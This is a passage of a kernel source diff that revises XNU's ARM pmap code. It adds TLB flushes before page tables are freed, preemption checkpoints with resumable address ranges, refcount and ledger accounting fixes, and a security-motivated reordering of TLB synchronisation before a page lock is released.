        *ttep = (tt_entry_t) 0;
        FLUSH_PTE_STRONG(ttep);
 #endif /* (__ARM_VMSA__ == 7) */
+       // If given a VA range, we're being asked to flush the TLB before the table in ttep is freed.
+       if (va_end > va_start) {
+#if (__ARM_VMSA__ == 7)
+               // Ensure intermediate translations are flushed for each 1MB block
+               flush_mmu_tlb_entry_async((va_start & ~ARM_TT_L1_PT_OFFMASK) | (pmap->hw_asid & 0xff));
+               flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
+               flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + 2 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
+               flush_mmu_tlb_entry_async(((va_start & ~ARM_TT_L1_PT_OFFMASK) + 3 * ARM_TT_L1_SIZE) | (pmap->hw_asid & 0xff));
+#endif
+               PMAP_UPDATE_TLBS(pmap, va_start, va_end, need_strong_sync);
+       }
 }
 
 /**
@@ -6235,6 +6523,9 @@ pmap_tte_remove(
  *       must have a refcnt of PT_DESC_REFCOUNT in their page table descriptor.
  *
  * @param pmap The pmap that owns the page table to be deallocated.
+ * @param va_start Beginning of the VA range mapped by the table being removed, for TLB maintenance
+ * @param va_end Non-inclusive end of the VA range mapped by the table being removed, for TLB maintenance
+ * @param need_strong_sync Indicates whether strong DSB should be used to synchronize TLB maintenance
  * @param ttep Pointer to the `level` TTE to remove.
  * @param level The level of the table that contains an entry pointing to the
  *              table to be removed. The deallocated page table will be a
@@ -6244,6 +6535,9 @@ pmap_tte_remove(
 static void
 pmap_tte_deallocate(
        pmap_t pmap,
+       vm_offset_t va_start,
+       vm_offset_t va_end,
+       bool need_strong_sync,
        tt_entry_t *ttep,
        unsigned int level)
 {
@@ -6261,7 +6555,7 @@ pmap_tte_deallocate(
        }
 #endif /* MACH_ASSERT */
 
-       pmap_tte_remove(pmap, ttep, level);
+       pmap_tte_remove(pmap, va_start, va_end, need_strong_sync, ttep, level);
 
        if ((tte & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) {
                uint64_t pmap_page_size = pt_attr_page_size(pmap_get_pt_attr(pmap));
@@ -6301,19 +6595,17 @@ pmap_tte_deallocate(
  *     entirely within one pte-page.  This is NOT checked.
  *     Assumes that the pte-page exists.
  *
- *     Returns the number of PTE changed, and sets *rmv_cnt
- *     to the number of SPTE changed.
+ *     Returns the number of PTE changed
  */
 static int
 pmap_remove_range(
        pmap_t pmap,
        vm_map_address_t va,
        pt_entry_t *bpte,
-       pt_entry_t *epte,
-       uint32_t *rmv_cnt)
+       pt_entry_t *epte)
 {
        bool need_strong_sync = false;
-       int num_changed = pmap_remove_range_options(pmap, va, bpte, epte, rmv_cnt,
+       int num_changed = pmap_remove_range_options(pmap, va, bpte, epte, NULL,
            &need_strong_sync, PMAP_OPTIONS_REMOVE);
        if (num_changed > 0) {
                PMAP_UPDATE_TLBS(pmap, va,
@@ -6470,11 +6762,12 @@ pmap_remove_range_options(
        vm_map_address_t va,
        pt_entry_t *bpte,
        pt_entry_t *epte,
-       uint32_t *rmv_cnt,
+       vm_map_address_t *eva,
        bool *need_strong_sync __unused,
        int options)
 {
        pt_entry_t     *cpte;
+       size_t          npages = 0;
        int             num_removed, num_unwired;
        int             num_pte_changed;
        int             pai = 0;
@@ -6482,11 +6775,12 @@ pmap_remove_range_options(
        int             num_external, num_internal, num_reusable;
        int             num_alt_internal;
        uint64_t        num_compressed, num_alt_compressed;
+       int16_t         refcnt = 0;
 
        pmap_assert_locked_w(pmap);
 
        const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap);
-       uint64_t pmap_page_size = pt_attr_page_size(pt_attr);
+       uint64_t pmap_page_size = PAGE_RATIO * pt_attr_page_size(pt_attr);
 
        if (__improbable((uintptr_t)epte > (((uintptr_t)bpte + pmap_page_size) & ~(pmap_page_size - 1)))) {
                panic("%s: PTE range [%p, %p) in pmap %p crosses page table boundary", __func__, bpte, epte, pmap);
@@ -6503,10 +6797,18 @@ pmap_remove_range_options(
        num_alt_compressed = 0;
 
        for (cpte = bpte; cpte < epte;
-           cpte += 1, va += pmap_page_size) {
+           cpte += PAGE_RATIO, va += pmap_page_size) {
                pt_entry_t      spte;
                boolean_t       managed = FALSE;
 
+               /*
+                * Check for pending preemption on every iteration: the PV list may be arbitrarily long,
+                * so we need to be as aggressive as possible in checking for preemption when we can.
+                */
+               if (__improbable((eva != NULL) && npages++ && pmap_pending_preemption())) {
+                       *eva = va;
+                       break;
+               }
                spte = *((volatile pt_entry_t*)cpte);
 
 #if CONFIG_PGTRACE
@@ -6539,9 +6841,7 @@ pmap_remove_range_options(
                                 * our "compressed" markers,
                                 * so let's update it here.
                                 */
-                               if (OSAddAtomic16(-1, (SInt16 *) &(ptep_get_info(cpte)->refcnt)) <= 0) {
-                                       panic("pmap_remove_range_options: over-release of ptdp %p for pte %p", ptep_get_ptd(cpte), cpte);
-                               }
+                               --refcnt;
                                spte = *((volatile pt_entry_t*)cpte);
                        }
                        /*
@@ -6603,12 +6903,7 @@ pmap_remove_range_options(
                    (pmap != kernel_pmap)) {
                        assertf(!ARM_PTE_IS_COMPRESSED(spte, cpte), "unexpected compressed pte %p (=0x%llx)", cpte, (uint64_t)spte);
                        assertf((spte & ARM_PTE_TYPE_VALID) == ARM_PTE_TYPE, "invalid pte %p (=0x%llx)", cpte, (uint64_t)spte);
-                       if (OSAddAtomic16(-1, (SInt16 *) &(ptep_get_info(cpte)->refcnt)) <= 0) {
-                               panic("pmap_remove_range_options: over-release of ptdp %p for pte %p", ptep_get_ptd(cpte), cpte);
-                       }
-                       if (rmv_cnt) {
-                               (*rmv_cnt)++;
-                       }
+                       --refcnt;
                }
 
                if (pte_is_wired(spte)) {
@@ -6636,9 +6931,12 @@ pmap_remove_range_options(
         *      Update the counts
         */
        OSAddAtomic(-num_removed, (SInt32 *) &pmap->stats.resident_count);
-       pmap_ledger_debit(pmap, task_ledgers.phys_mem, num_removed * pmap_page_size * PAGE_RATIO);
+       pmap_ledger_debit(pmap, task_ledgers.phys_mem, num_removed * pmap_page_size);
 
        if (pmap != kernel_pmap) {
+               if ((refcnt != 0) && (OSAddAtomic16(refcnt, (SInt16 *) &(ptep_get_info(bpte)->refcnt)) <= 0)) {
+                       panic("pmap_remove_range_options: over-release of ptdp %p for pte [%p, %p)", ptep_get_ptd(bpte), bpte, epte);
+               }
                /* update pmap stats... */
                OSAddAtomic(-num_unwired, (SInt32 *) &pmap->stats.wired_count);
                if (num_external) {
@@ -6675,17 +6973,17 @@ pmap_remove_range_options(
                            orig_compressed);
                }
                /* ... and ledgers */
-               pmap_ledger_debit(pmap, task_ledgers.wired_mem, (num_unwired) * pmap_page_size * PAGE_RATIO);
-               pmap_ledger_debit(pmap, task_ledgers.internal, (num_internal) * pt_attr_page_size(pt_attr) * PAGE_RATIO);
-               pmap_ledger_debit(pmap, task_ledgers.alternate_accounting, (num_alt_internal) * pt_attr_page_size(pt_attr) * PAGE_RATIO);
-               pmap_ledger_debit(pmap, task_ledgers.alternate_accounting_compressed, (num_alt_compressed) * pt_attr_page_size(pt_attr) * PAGE_RATIO);
-               pmap_ledger_debit(pmap, task_ledgers.internal_compressed, (num_compressed) * pt_attr_page_size(pt_attr) * PAGE_RATIO);
+               pmap_ledger_debit(pmap, task_ledgers.wired_mem, (num_unwired) * pmap_page_size);
+               pmap_ledger_debit(pmap, task_ledgers.internal, (num_internal) * pmap_page_size);
+               pmap_ledger_debit(pmap, task_ledgers.alternate_accounting, (num_alt_internal) * pmap_page_size);
+               pmap_ledger_debit(pmap, task_ledgers.alternate_accounting_compressed, (num_alt_compressed) * pmap_page_size);
+               pmap_ledger_debit(pmap, task_ledgers.internal_compressed, (num_compressed) * pmap_page_size);
                /* make needed adjustments to phys_footprint */
                pmap_ledger_debit(pmap, task_ledgers.phys_footprint,
                    ((num_internal -
                    num_alt_internal) +
                    (num_compressed -
-                   num_alt_compressed)) * pmap_page_size * PAGE_RATIO);
+                   num_alt_compressed)) * pmap_page_size);
        }
 
        /* flush the ptable entries we have written */
@@ -6713,20 +7011,19 @@ pmap_remove(
        pmap_remove_options(pmap, start, end, PMAP_OPTIONS_REMOVE);
 }
 
-MARK_AS_PMAP_TEXT static int
+MARK_AS_PMAP_TEXT static vm_map_address_t
 pmap_remove_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
        int options)
 {
-       int             remove_count = 0;
+       vm_map_address_t eva = end;
        pt_entry_t     *bpte, *epte;
        pt_entry_t     *pte_p;
        tt_entry_t     *tte_p;
-       uint32_t        rmv_spte = 0;
+       int             remove_count = 0;
        bool            need_strong_sync = false;
-       bool            flush_tte = false;
 
        if (__improbable(end < start)) {
                panic("%s: invalid address range %p, %p", __func__, (void*)start, (void*)end);
@@ -6749,13 +7046,12 @@ pmap_remove_options_internal(
                bpte = &pte_p[pte_index(pmap, pt_attr, start)];
                epte = bpte + ((end - start) >> pt_attr_leaf_shift(pt_attr));
 
-               remove_count += pmap_remove_range_options(pmap, start, bpte, epte,
-                   &rmv_spte, &need_strong_sync, options);
+               remove_count = pmap_remove_range_options(pmap, start, bpte, epte, &eva,
+                   &need_strong_sync, options);
 
-               if (rmv_spte && (ptep_get_info(pte_p)->refcnt == 0) &&
-                   (pmap != kernel_pmap) && (pmap->nested == FALSE)) {
-                       pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr));
-                       flush_tte = true;
+               if ((pmap != kernel_pmap) && (pmap->nested == FALSE) && (ptep_get_info(pte_p)->refcnt == 0)) {
+                       pmap_tte_deallocate(pmap, start, eva, need_strong_sync, tte_p, pt_attr_twig_level(pt_attr));
+                       remove_count = 0; // pmap_tte_deallocate has flushed the TLB for us
                }
        }
 
@@ -6763,12 +7059,9 @@ done:
        pmap_unlock(pmap);
 
        if (remove_count > 0) {
-               PMAP_UPDATE_TLBS(pmap, start, end, need_strong_sync);
-       } else if (flush_tte) {
-               pmap_get_pt_ops(pmap)->flush_tlb_tte_async(start, pmap);
-               sync_tlb_flush();
+               PMAP_UPDATE_TLBS(pmap, start, eva, need_strong_sync);
        }
-       return remove_count;
+       return eva;
 }
 
 void
@@ -6778,7 +7071,6 @@ pmap_remove_options(
        vm_map_address_t end,
        int options)
 {
-       int             remove_count = 0;
        vm_map_address_t va;
 
        if (pmap == PMAP_NULL) {
@@ -6801,6 +7093,7 @@ pmap_remove_options(
                    pmap, (uint64_t)start, (uint64_t)end);
        }
 #endif
+       assert(get_preemption_level() == 0);
 
        /*
         *      Invalidate the translation buffer first
@@ -6815,14 +7108,12 @@ pmap_remove_options(
                }
 
 #if XNU_MONITOR
-               remove_count += pmap_remove_options_ppl(pmap, va, l, options);
+               va = pmap_remove_options_ppl(pmap, va, l, options);
 
                pmap_ledger_check_balance(pmap);
 #else
-               remove_count += pmap_remove_options_internal(pmap, va, l, options);
+               va = pmap_remove_options_internal(pmap, va, l, options);
 #endif
-
-               va = l;
        }
 
        PMAP_TRACE(2, PMAP_CODE(PMAP__REMOVE) | DBG_FUNC_END);
@@ -7061,6 +7352,8 @@ pmap_page_protect_options_with_flush_range(
                remove = FALSE;
                break;
        default:
+               /* PPL security model requires that we flush TLBs before we exit if the page may be recycled. */
+               options = options & ~PMAP_OPTIONS_NOFLUSH;
                remove = TRUE;
                break;
        }
@@ -7326,13 +7619,17 @@ pmap_page_protect_options_with_flush_range(
                        if (*pte_p != ARM_PTE_TYPE_FAULT &&
                            !ARM_PTE_IS_COMPRESSED(*pte_p, pte_p) &&
                            *pte_p != tmplate) {
-                               WRITE_PTE_STRONG(pte_p, tmplate);
+                               if (options & PMAP_OPTIONS_NOFLUSH) {
+                                       WRITE_PTE_FAST(pte_p, tmplate);
+                               } else {
+                                       WRITE_PTE_STRONG(pte_p, tmplate);
+                               }
                                update = TRUE;
                        }
                }
 
                /* Invalidate TLBs for all CPUs using it */
-               if (update) {
+               if (update && !(options & PMAP_OPTIONS_NOFLUSH)) {
                        if (remove || !flush_range ||
                            ((flush_range->ptfr_pmap != pmap) || va >= flush_range->ptfr_end || va < flush_range->ptfr_start)) {
                                pmap_get_pt_ops(pmap)->flush_tlb_region_async(va,
@@ -7373,15 +7670,26 @@ protect_skip_pve:
                }
        }
 
-       UNLOCK_PVH(pai);
-
        if (flush_range && tlb_flush_needed) {
                if (!remove) {
                        flush_range->ptfr_flush_needed = true;
                        tlb_flush_needed = FALSE;
                }
        }
-       if (tlb_flush_needed) {
+
+       /*
+        * If we removed PV entries, ensure prior TLB flushes are complete before we drop the PVH
+        * lock to allow the backing pages to be repurposed.  This is a security precaution, aimed
+        * primarily at XNU_MONITOR configurations, to reduce the likelihood of an attacker causing
+        * a page to be repurposed while it is still live in the TLBs.
+        */
+       if (remove && tlb_flush_needed) {
+               sync_tlb_flush();
+       }
+
+       UNLOCK_PVH(pai);
+
+       if (!remove && tlb_flush_needed) {
                sync_tlb_flush();
        }
 
@@ -7394,8 +7702,19 @@ MARK_AS_PMAP_TEXT static void
 pmap_page_protect_options_internal(
        ppnum_t ppnum,
        vm_prot_t prot,
-       unsigned int options)
+       unsigned int options,
+       void *arg)
 {
+       if (arg != NULL) {
+               /*
+                * If the argument is non-NULL, the VM layer is conveying its intention that the TLBs should
+                * ultimately be flushed.  The nature of ARM TLB maintenance is such that we can flush the
+                * TLBs much more precisely if we do so inline with the pagetable updates, and PPL security
+                * model requires that we not exit the PPL without performing required TLB flushes anyway.
+                * In that case, force the flush to take place.
+                */
+               options &= ~PMAP_OPTIONS_NOFLUSH;
+       }
        pmap_page_protect_options_with_flush_range(ppnum, prot, options, NULL);
 }
 
@@ -7404,7 +7723,7 @@ pmap_page_protect_options(
        ppnum_t ppnum,
        vm_prot_t prot,
        unsigned int options,
-       __unused void *arg)
+       void *arg)
 {
        pmap_paddr_t    phys = ptoa(ppnum);
 
@@ -7425,9 +7744,9 @@ pmap_page_protect_options(
        PMAP_TRACE(2, PMAP_CODE(PMAP__PAGE_PROTECT) | DBG_FUNC_START, ppnum, prot);
 
 #if XNU_MONITOR
-       pmap_page_protect_options_ppl(ppnum, prot, options);
+       pmap_page_protect_options_ppl(ppnum, prot, options, arg);
 #else
-       pmap_page_protect_options_internal(ppnum, prot, options);
+       pmap_page_protect_options_internal(ppnum, prot, options, arg);
 #endif
 
        PMAP_TRACE(2, PMAP_CODE(PMAP__PAGE_PROTECT) | DBG_FUNC_END);
@@ -7482,7 +7801,7 @@ pmap_protect(
        pmap_protect_options(pmap, b, e, prot, 0, NULL);
 }
 
-MARK_AS_PMAP_TEXT static void
+MARK_AS_PMAP_TEXT static vm_map_address_t
 pmap_protect_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
@@ -7526,7 +7845,7 @@ pmap_protect_options_internal(
                        break;
                case VM_PROT_READ | VM_PROT_WRITE:
                case VM_PROT_ALL:
-                       return;         /* nothing to do */
+                       return end;         /* nothing to do */
                default:
                        should_have_removed = TRUE;
                }
@@ -7550,6 +7869,10 @@ pmap_protect_options_internal(
                set_NX = TRUE;
        }
 
+       const uint64_t pmap_page_size = PAGE_RATIO * pt_attr_page_size(pt_attr);
+       vm_map_address_t va = start;
+       unsigned int npages = 0;
+
        VALIDATE_PMAP(pmap);
        pmap_lock(pmap);
 
@@ -7563,7 +7886,12 @@ pmap_protect_options_internal(
 
                for (pte_p = bpte_p;
                    pte_p < epte_p;
-                   pte_p += PAGE_RATIO) {
+                   pte_p += PAGE_RATIO, va += pmap_page_size) {
+                       ++npages;
+                       if (__improbable(!(npages % PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL) &&
+                           pmap_pending_preemption())) {
+                               break;
+                       }
                        pt_entry_t spte;
 #if DEVELOPMENT || DEBUG
                        boolean_t  force_write = FALSE;
@@ -7708,11 +8036,14 @@ pmap_protect_options_internal(
                                UNLOCK_PVH(pai);
                        }
                }
-               FLUSH_PTE_RANGE_STRONG(bpte_p, epte_p);
-               PMAP_UPDATE_TLBS(pmap, start, end, need_strong_sync);
+               FLUSH_PTE_RANGE_STRONG(bpte_p, pte_p);
+               PMAP_UPDATE_TLBS(pmap, start, va, need_strong_sync);
+       } else {
+               va = end;
        }
 
        pmap_unlock(pmap);
+       return va;
 }
 
 void
@@ -7733,6 +8064,8 @@ pmap_protect_options(
                    pmap, (uint64_t)b, (uint64_t)e);
        }
 
+       assert(get_preemption_level() == 0);
+
 #if DEVELOPMENT || DEBUG
        if (options & PMAP_OPTIONS_PROTECT_IMMEDIATE) {
                if ((prot & VM_PROT_ALL) == VM_PROT_NONE) {
@@ -7771,12 +8104,10 @@ pmap_protect_options(
                }
 
 #if XNU_MONITOR
-               pmap_protect_options_ppl(pmap, beg, l, prot, options, args);
+               beg = pmap_protect_options_ppl(pmap, beg, l, prot, options, args);
 #else
-               pmap_protect_options_internal(pmap, beg, l, prot, options, args);
+               beg = pmap_protect_options_internal(pmap, beg, l, prot, options, args);
 #endif
-
-               beg = l;
        }
 
        PMAP_TRACE(2, PMAP_CODE(PMAP__PROTECT) | DBG_FUNC_END);
@@ -8127,6 +8458,12 @@ pmap_enter_options_internal(
 
        VALIDATE_PMAP(pmap);
 
+#if XNU_MONITOR
+       if (__improbable((options & PMAP_OPTIONS_NOWAIT) == 0)) {
+               panic("pmap_enter_options() called without PMAP_OPTIONS_NOWAIT set");
+       }
+#endif
+
        __unused const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap);
 
        if ((v) & pt_attr_leaf_offmask(pt_attr)) {
@@ -8201,7 +8538,7 @@ Pmap_enter_retry:
 
        spte = *pte_p;
 
-       if (ARM_PTE_IS_COMPRESSED(spte, pte_p)) {
+       if (ARM_PTE_IS_COMPRESSED(spte, pte_p) && !refcnt_updated) {
                /*
                 * "pmap" should be locked at this point, so this should
                 * not race with another pmap_enter() or pmap_remove_range().
@@ -8235,7 +8572,7 @@ Pmap_enter_retry:
        }
 
        if ((spte != ARM_PTE_TYPE_FAULT) && (pte_to_pa(spte) != pa)) {
-               pmap_remove_range(pmap, v, pte_p, pte_p + PAGE_RATIO, 0);
+               pmap_remove_range(pmap, v, pte_p, pte_p + PAGE_RATIO);
        }
 
        pte = pa_to_pte(pa) | ARM_PTE_TYPE;
@@ -8290,7 +8627,7 @@ Pmap_enter_retry:
                        vm_map_address_t nest_vaddr;
                        pt_entry_t              *nest_pte_p;
 
-                       nest_vaddr = v - pmap->nested_region_addr + pmap->nested_region_addr;
+                       nest_vaddr = v;
 
                        if ((nest_vaddr >= pmap->nested_region_addr)
                            && (nest_vaddr < (pmap->nested_region_addr + pmap->nested_region_size))
@@ -8310,6 +8647,7 @@ Pmap_enter_retry:
 #endif
                if (prot & VM_PROT_WRITE) {
                        if (pa_valid(pa) && (!pa_test_bits(pa, PP_ATTR_MODIFIED))) {
+                               assert(!pmap->nested); /* no write access in a nested pmap */
                                if (fault_type & VM_PROT_WRITE) {
                                        if (set_XO) {
                                                pte |= pt_attr_leaf_rwna(pt_attr);
@@ -8323,7 +8661,11 @@ Pmap_enter_retry:
                                        } else {
                                                pte |= pt_attr_leaf_ro(pt_attr);
                                        }
-                                       pa_set_bits(pa, PP_ATTR_REFERENCED);
+                                       /*
+                                        * Mark the page as MODFAULT so that a subsequent write
+                                        * may be handled through arm_fast_fault().
+                                        */
+                                       pa_set_bits(pa, PP_ATTR_REFERENCED | PP_ATTR_MODFAULT);
                                        pte_set_was_writeable(pte, true);
                                }
                        } else {
@@ -9336,18 +9678,19 @@ phys_attribute_clear_with_flush_range(
        vm_prot_t       allow_mode = VM_PROT_ALL;
 
 #if XNU_MONITOR
-       if (bits & PP_ATTR_PPL_OWNED_BITS) {
+       if (__improbable(bits & PP_ATTR_PPL_OWNED_BITS)) {
                panic("%s: illegal request, "
                    "pn=%u, bits=%#x, options=%#x, arg=%p, flush_range=%p",
                    __FUNCTION__,
                    pn, bits, options, arg, flush_range);
        }
 #endif
+       if ((arg != NULL) || (flush_range != NULL)) {
+               options = options & ~PMAP_OPTIONS_NOFLUSH;
+       }
 
-       if ((bits & PP_ATTR_MODIFIED) &&
-           (options & PMAP_OPTIONS_NOFLUSH) &&
-           (arg == NULL) &&
-           (flush_range == NULL)) {
+       if (__improbable((bits & PP_ATTR_MODIFIED) &&
+           (options & PMAP_OPTIONS_NOFLUSH))) {
                panic("phys_attribute_clear(0x%x,0x%x,0x%x,%p,%p): "
                    "should not clear 'modified' without flushing TLBs\n",
                    pn, bits, options, arg, flush_range);
@@ -9358,7 +9701,7 @@ phys_attribute_clear_with_flush_range(
        if (options & PMAP_OPTIONS_CLEAR_WRITE) {
                assert(bits == PP_ATTR_MODIFIED);
 
-               pmap_page_protect_options_with_flush_range(pn, (VM_PROT_ALL & ~VM_PROT_WRITE), 0, flush_range);
+               pmap_page_protect_options_with_flush_range(pn, (VM_PROT_ALL & ~VM_PROT_WRITE), options, flush_range);
                /*
                 * We short circuit this case; it should not need to
                 * invoke arm_force_fast_fault, so just clear the modified bit.
@@ -9402,7 +9745,7 @@ phys_attribute_clear_internal(
 }
 
 #if __ARM_RANGE_TLBI__
-MARK_AS_PMAP_TEXT static void
+MARK_AS_PMAP_TEXT static vm_map_address_t
 phys_attribute_clear_twig_internal(
        pmap_t pmap,
        vm_map_address_t start,
@@ -9415,12 +9758,15 @@ phys_attribute_clear_twig_internal(
        const pt_attr_t * const pt_attr = pmap_get_pt_attr(pmap);
        assert(end >= start);
        assert((end - start) <= pt_attr_twig_size(pt_attr));
+       const uint64_t pmap_page_size = pt_attr_page_size(pt_attr);
+       vm_map_address_t va = start;
        pt_entry_t     *pte_p, *start_pte_p, *end_pte_p, *curr_pte_p;
        tt_entry_t     *tte_p;
        tte_p = pmap_tte(pmap, start);
+       unsigned int npages = 0;
 
        if (tte_p == (tt_entry_t *) NULL) {
-               return;
+               return end;
        }
 
        if ((*tte_p & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) {
@@ -9429,7 +9775,10 @@ phys_attribute_clear_twig_internal(
                start_pte_p = &pte_p[pte_index(pmap, pt_attr, start)];
                end_pte_p = start_pte_p + ((end - start) >> pt_attr_leaf_shift(pt_attr));
                assert(end_pte_p >= start_pte_p);
-               for (curr_pte_p = start_pte_p; curr_pte_p < end_pte_p; curr_pte_p++) {
+               for (curr_pte_p = start_pte_p; curr_pte_p < end_pte_p; curr_pte_p++, va += pmap_page_size) {
+                       if (__improbable(npages++ && pmap_pending_preemption())) {
+                               return va;
+                       }
                        pmap_paddr_t pa = pte_to_pa(*((volatile pt_entry_t*)curr_pte_p));
                        if (pa_valid(pa)) {
                                ppnum_t pn = (ppnum_t) atop(pa);
@@ -9437,9 +9786,10 @@ phys_attribute_clear_twig_internal(
                        }
                }
        }
+       return end;
 }
 
-MARK_AS_PMAP_TEXT static void
+MARK_AS_PMAP_TEXT static vm_map_address_t
 phys_attribute_clear_range_internal(
        pmap_t pmap,
        vm_map_address_t start,
@@ -9471,17 +9821,21 @@ phys_attribute_clear_range_internal(
                        curr_end = end;
                }
 
-               phys_attribute_clear_twig_internal(pmap, va, curr_end, bits, options, &flush_range);
-               va = curr_end;
+               va = phys_attribute_clear_twig_internal(pmap, va, curr_end, bits, options, &flush_range);
+               if ((va < curr_end) || pmap_pending_preemption()) {
+                       break;
+               }
        }
        pmap_unlock_ro(pmap);
        if (flush_range.ptfr_flush_needed) {
+               flush_range.ptfr_end = va;
                pmap_get_pt_ops(pmap)->flush_tlb_region_async(
                        flush_range.ptfr_start,
                        flush_range.ptfr_end - flush_range.ptfr_start,
                        flush_range.ptfr_pmap);
                sync_tlb_flush();
        }
+       return va;
 }
 
 static void
@@ -9492,13 +9846,17 @@ phys_attribute_clear_range(
        unsigned int bits,
        unsigned int options)
 {
+       assert(get_preemption_level() == 0);
+
        PMAP_TRACE(3, PMAP_CODE(PMAP__ATTRIBUTE_CLEAR_RANGE) | DBG_FUNC_START, bits);
 
+       while (start < end) {
 #if XNU_MONITOR
-       phys_attribute_clear_range_ppl(pmap, start, end, bits, options);
+               start = phys_attribute_clear_range_ppl(pmap, start, end, bits, options);
 #else
-       phys_attribute_clear_range_internal(pmap, start, end, bits, options);
+               start = phys_attribute_clear_range_internal(pmap, start, end, bits, options);
 #endif
+       }
 
        PMAP_TRACE(3, PMAP_CODE(PMAP__ATTRIBUTE_CLEAR_RANGE) | DBG_FUNC_END);
 }
@@ -10168,8 +10526,9 @@ arm_force_fast_fault_with_flush_range(
 #endif /* MACH_ASSERT && XNU_MONITOR */
 
                if (result && update_pte) {
-                       if (*pte_p != ARM_PTE_TYPE_FAULT &&
-                           !ARM_PTE_IS_COMPRESSED(*pte_p, pte_p)) {
+                       if (options & PMAP_OPTIONS_NOFLUSH) {
+                               WRITE_PTE_FAST(pte_p, tmplate);
+                       } else {
                                WRITE_PTE_STRONG(pte_p, tmplate);
                                if (!flush_range ||
                                    ((flush_range->ptfr_pmap != pmap) || va >= flush_range->ptfr_end || va < flush_range->ptfr_start)) {
@@ -10177,9 +10536,6 @@ arm_force_fast_fault_with_flush_range(
                                            pt_attr_page_size(pt_attr) * PAGE_RATIO, pmap);
                                }
                                tlb_flush_needed = TRUE;
-                       } else {
-                               WRITE_PTE(pte_p, tmplate);
-                               __builtin_arm_isb(ISB_SY);
                        }
                }
 
@@ -10238,7 +10594,7 @@ arm_force_fast_fault_internal(
        vm_prot_t       allow_mode,
        int             options)
 {
-       if (__improbable((options & PMAP_OPTIONS_FF_LOCKED) != 0)) {
+       if (__improbable((options & (PMAP_OPTIONS_FF_LOCKED | PMAP_OPTIONS_NOFLUSH)) != 0)) {
                panic("arm_force_fast_fault(0x%x, 0x%x, 0x%x): invalid options", ppnum, allow_mode, options);
        }
        return arm_force_fast_fault_with_flush_range(ppnum, allow_mode, options, NULL);
@@ -10349,6 +10705,7 @@ arm_clear_fast_fault(
                                if (pmap == kernel_pmap) {
                                        tmplate = ((spte & ~ARM_PTE_APMASK) | ARM_PTE_AP(AP_RWNA));
                                } else {
+                                       assert(!pmap->nested); /* no write access in a nested pmap */
                                        tmplate = ((spte & ~ARM_PTE_APMASK) | pt_attr_leaf_rw(pmap_get_pt_attr(pmap)));
                                }
                        }
@@ -10432,7 +10789,7 @@ arm_fast_fault_internal(
        pmap_paddr_t    pa;
        VALIDATE_PMAP(pmap);
 
-       pmap_lock(pmap);
+       pmap_lock_ro(pmap);
 
        /*
         * If the entry doesn't exist, is completely invalid, or is already
@@ -10448,12 +10805,12 @@ arm_fast_fault_internal(
 
                        if ((spte == ARM_PTE_TYPE_FAULT) ||
                            ARM_PTE_IS_COMPRESSED(spte, ptep)) {
-                               pmap_unlock(pmap);
+                               pmap_unlock_ro(pmap);
                                return result;
                        }
 
                        if (!pa_valid(pa)) {
-                               pmap_unlock(pmap);
+                               pmap_unlock_ro(pmap);
 #if XNU_MONITOR
                                if (pmap_cache_attributes((ppnum_t)atop(pa)) & PP_ATTR_MONITOR) {
                                        return KERN_PROTECTION_FAILURE;
@@ -10466,13 +10823,13 @@ arm_fast_fault_internal(
                        break;
                }
        } else {
-               pmap_unlock(pmap);
+               pmap_unlock_ro(pmap);
                return result;
        }
 
 
-       if ((IS_REFFAULT_PAGE(pai)) ||
-           ((fault_type & VM_PROT_WRITE) && IS_MODFAULT_PAGE(pai))) {
+       if ((result != KERN_SUCCESS) &&
+           ((IS_REFFAULT_PAGE(pai)) || ((fault_type & VM_PROT_WRITE) && IS_MODFAULT_PAGE(pai)))) {
                /*
                 * An attempted access will always clear ref/mod fault state, as
                 * appropriate for the fault type.  arm_clear_fast_fault will
@@ -10500,8 +10857,39 @@ arm_fast_fault_internal(
                }
        }
 
+       /*
+        * If the PTE already has sufficient permissions, we can report the fault as handled.
+        * This may happen, for example, if multiple threads trigger roughly simultaneous faults
+        * on mappings of the same page
+        */
+       if ((result == KERN_FAILURE) && (spte & ARM_PTE_AF)) {
+               uintptr_t ap_ro, ap_rw, ap_x;
+               if (pmap == kernel_pmap) {
+                       ap_ro = ARM_PTE_AP(AP_RONA);
+                       ap_rw = ARM_PTE_AP(AP_RWNA);
+                       ap_x = ARM_PTE_NX;
+               } else {
+                       ap_ro = pt_attr_leaf_ro(pmap_get_pt_attr(pmap));
+                       ap_rw = pt_attr_leaf_rw(pmap_get_pt_attr(pmap));
+                       ap_x = pt_attr_leaf_x(pmap_get_pt_attr(pmap));
+               }
+               /*
+                * NOTE: this doesn't currently handle user-XO mappings. Depending upon the
+                * hardware they may be xPRR-protected, in which case they'll be handled
+                * by the is_pte_xprr_protected() case above.  Additionally, the exception
+                * handling path currently does not call arm_fast_fault() without at least
+                * VM_PROT_READ in fault_type.
+                */
+               if (((spte & ARM_PTE_APMASK) == ap_rw) ||
+                   (!(fault_type & VM_PROT_WRITE) && ((spte & ARM_PTE_APMASK) == ap_ro))) {
+                       if (!(fault_type & VM_PROT_EXECUTE) || ((spte & ARM_PTE_XMASK) == ap_x)) {
+                               result = KERN_SUCCESS;
+                       }
+               }
+       }
+
        UNLOCK_PVH(pai);
-       pmap_unlock(pmap);
+       pmap_unlock_ro(pmap);
        return result;
 }
 
@@ -10950,7 +11338,6 @@ pmap_trim_range(
        adjust_offmask = pt_attr_leaf_table_offmask(pt_attr);
        adjusted_start = ((start + adjust_offmask) & ~adjust_offmask);
        adjusted_end = end & ~adjust_offmask;
-       bool modified = false;
 
        /* Iterate over the range, trying to remove TTEs. */
        for (cur = adjusted_start; (cur < adjusted_end) && (cur >= adjusted_start); cur += pt_attr_twig_size(pt_attr)) {
@@ -10969,14 +11356,11 @@ pmap_trim_range(
                            (pmap != kernel_pmap)) {
                                if (pmap->nested == TRUE) {
                                        /* Deallocate for the nested map. */
